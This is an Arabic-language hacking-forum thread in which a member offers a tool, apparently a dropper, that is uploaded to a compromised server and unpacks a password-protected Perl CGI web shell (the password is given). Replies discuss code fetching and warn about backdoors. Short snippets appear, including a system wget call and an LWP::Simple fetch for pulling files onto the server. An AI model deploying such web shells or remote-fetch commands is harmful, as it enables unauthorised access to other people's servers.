حصريا اداة [ 6 × 1 ] أدخل حمل

ألسلام عليكم ورحمة ألله

وفقا لقانون أختصار ألوقت

حبيت أطور لكم أداة رائعه , وسوف تكتشفون مدى فائدتها بأنفسكم

أشرح لكم شرح بسيط للاداة

مجرد أنك ترفعها على ألهدف وتستعرضها سوف تكون لك 6 ملفات

انت ماعليك بس أدخل على ملف

cgi.cc

وحط ألباسورد : s0w

وراح تشوف عندك البيرل اشتغل تمام

وهذه صورة من الادوات الي موجوده في البيرل
[b]

مجرد ألضغط على السكربت يقوم بتوجيهك الى مساره[/b]

للتحميل :

[b] http://www.multiupload.com/4M05CCKFJC[/b]

ألاداة من تطويري ولا أسمح بأزاله ألحقوق

تحياتي للجميع

شكرا لك أخي على المبادرة الطيبة و على المجهود الأكثر من رائع

تقبل مروري أخي :slight_smile:

شكرا لك أخي

[b]بارك لله فيك على الطرح :slight_smile:

جاري الاطلاع … ;)[/b]

السلام عليكم

بعد الاطلاع على ملف جلب الادوات

ما رأيك في إختصار من 60 سطر الى 30 :slight_smile: اذا ما في مانع

تفضل اختصرت في الاكواد , ملف المعدل في مرفقات

1.txt (547 Bytes)

مميز جدا اخى بارك الله فيك.

يعطيك العافية اخى لكن بدون ما اريد اجرحك لازم انبه لشىء مهم.

انو باستعمالك لدالة file_get_contents تسحب من موقعك يمكنك ان تستعملها في عدة خيانات:

1-معرفة المكان الذى سحب منه الملفات

2- التلغيم باى كود تريد و استعمال .

يعنى احسن كنت تضع الملفات مع السكريبت و المستخدم له الحرية في السحب من موقعه او اي موقع يريد .

اخى ارجو ان لاتفهمها بانى اشكك في صدقك لكن لازم التوضيح للأعضاء.

مشكور على تعاونك اخى.

بارك لله فيك

مشكور على العمل اخي الكريم لكن …

صح اخي نسيم
file_get_contents تستعمل في عدة خيانات اذن اخي حاول ترفع الملفات مع السكربت .zip والمستعمل يعمل مباشرة unzip او بامكانك عمله برل و وضع system(“wget http://site.com”); a7ssan

على ما أذكر إستخدمت الدالةfile_get_contents ثم عوضتها بسكريبت بارل من هذا النوع و كان أكثر نجاعة.

use LWP::Simple; 

getstore('http://www.sec4ever.com', 'sec4ever.com');

و لكن في كل الحالات لا يجلب الملفphp كما هو موجود في السيرفر، إنما كما يظهر في المتصفح يعني html

مشكور للاخ Lagripe-Dz على التطوير ولاحظت الاداة صارت حلوة

بالنسبه للاخ نسيم , من عيوني بحاول ارفق الملفات في اقرب وقت

تحياتي لك

العفو مرحبا بيك :wink: ,

شباب انا بس حبيت أسهل على المخترق العمليه

بحيث انه مجرد ان يقوم برفع الاداة تكون له هذه الملفات كلها

وبغير كده كان ممكن ما اسوي اداة تكوين , كان احط الادوات بالموضوع

أذا تحبون تعطوني مركز رفع دائم أرفع فيه الملفات txt ولذلك لامان ألمخترق

تحياتي للجميع

اخي العزيز
file_get_contents
هذه الدالة في حالة جلب ملف على موقع آخر لا تعمل لأنو في معضم السرفرات معطلين تضمين الملفات remote
:slight_smile:

جاري تطوير الاداة يا شباب

		 		[b] 			شكرا لك أخي 		  		[/b]